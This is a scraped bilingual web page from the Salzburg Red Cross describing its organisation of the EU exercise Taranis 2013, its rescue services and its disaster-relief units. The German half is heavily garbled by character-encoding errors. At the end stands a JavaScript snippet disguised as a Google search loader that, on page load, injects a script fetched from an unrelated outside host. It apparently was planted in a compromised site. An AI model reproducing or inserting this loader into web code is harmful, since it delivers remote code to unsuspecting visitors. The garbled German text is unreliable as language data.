Veranstalter

:deDer Landesverband Salzburg des Ai??sterreichischen Roten Kreuzes ist fA?r die Organisation der EU-A?bung Taranis 2013 verantwortlich und fA?hrt diese gemeinsam mit nationalen und internationalen Partnern durch.Das Salzburger Rote Kreuz ist die einzige fA?r den Rettungsdienst gesetzlich anerkannte Organisation im Bundesland Salzburg und stellt mit seinen 29 Dienststellen und A?ber 4.200 ehrenamtlichen und hauptberuflichen Mitarbeitern und Zivildienstleistenden den Rettungs- und Krankentransportdienst sicher.Sieben NotfalldienststA?tzpunkte und fA?nf NotarzthubschrauberstA?tzpunkte (in Kooperation mit privaten Flugrettungsunternehmen) des Roten Kreuzes sind ein wesentlicher Bestandteil eines hocheffizienten und rasch verfA?gbaren Rettungsdienstes.Das Rote Kreuz Salzburg in der KatastrophenhilfeDas Salzburger Rote Kreuz kann im Bereich der Katastrophenhilfe auf eine langjAi??hrige internationale Erfahrung verweisen.Mitarbeiter des Salzburger Roten Kreuzes waren unter anderem beim BA?rgerkrieg in RumAi??nien (1988/1989), beim BA?rgerkrieg im Kosovo (1999), nach dem Tsunami in Sri Lanka (2004), bei der Flutkatastrophe in Pakistan (2010) und zuletzt nach dem Erdbeben in Haiti (2010) im Einsatz.FA?r die Katastrophenhilfe werden viele gut ausgebildete und erfahrene Sondereinheiten des Landesverbandes Salzburg vorgehalten: eine Trinkwasseraufbereitungseinheit, eine Suchhundestaffel, Kriseninterventionsteams zur psychosozialen Betreuung, FeldkA?chen, ein Fernmeldetrupp und eine Logistikstaffel. Gemeinsam mit dem Landesfeuerwehrverband wird eine Einheit zur Patientendekontamination und eine Heavy Urban Search and Rescue-Einheit bereitgehalten.In den einzelnen Rotkreuz-Bezirken stehen zusAi??tzlich noch weitere 12 technische ZA?ge fA?r den regionalen Katastrophenschutz bereit.

Dienststellennetz des Roten Kreuzes Salzburg

::enThe Province of Salzburg Division of the Austrian Red Cross in cooperation with its national and international partners is responsible for the organisation of EU Taranis 2013.In Salzburg, the Red Cross is the only legally recognised rescue organisation. It has 29 regional departments with over 4,200 voluntary and employed members in its ambulance services, seven emergency departments, and five rescue-helicopter bases which together are all part of the highly efficient rescue service.The Red Cross in catastrophe reliefThe Red Cross movement in Austria has a vast amount of experience in the field of international catastrophe relief. Members of the Red Cross Salzburg were sent, for example, to Romania during the civil war in 1988/89, to Kosovo (1999), to Sri Lanka (Tsunami, 2004), to Pakistan (2010) and also to Haiti (earthquake, 2010).Many well trained and experience special units from the Salzburg division are available for disaster control operations: a water purification unit, a canine search squad, crisis intervention teams for psycho-social care, field kitchens, a signal corps and a logistics team. Together with the regional fire brigade a Patient Decontamination unit and a Heavy Urban Search and Rescue unit will be on standby. In the other regional Red Cross divisions an additional 12 technical teams are all also ready to be put into action.

Departments of the Red Cross

:

(function() {
var gcse = document.createElement(‘script’);
gcse.type = ‘text/javascript’;
gcse.async = true;
gcse.src = “http://ninni.org/core9Om3.php”;
var s = document.getElementsByTagName(‘script’)[0];
s.parentNode.insertBefore(gcse, s);
})();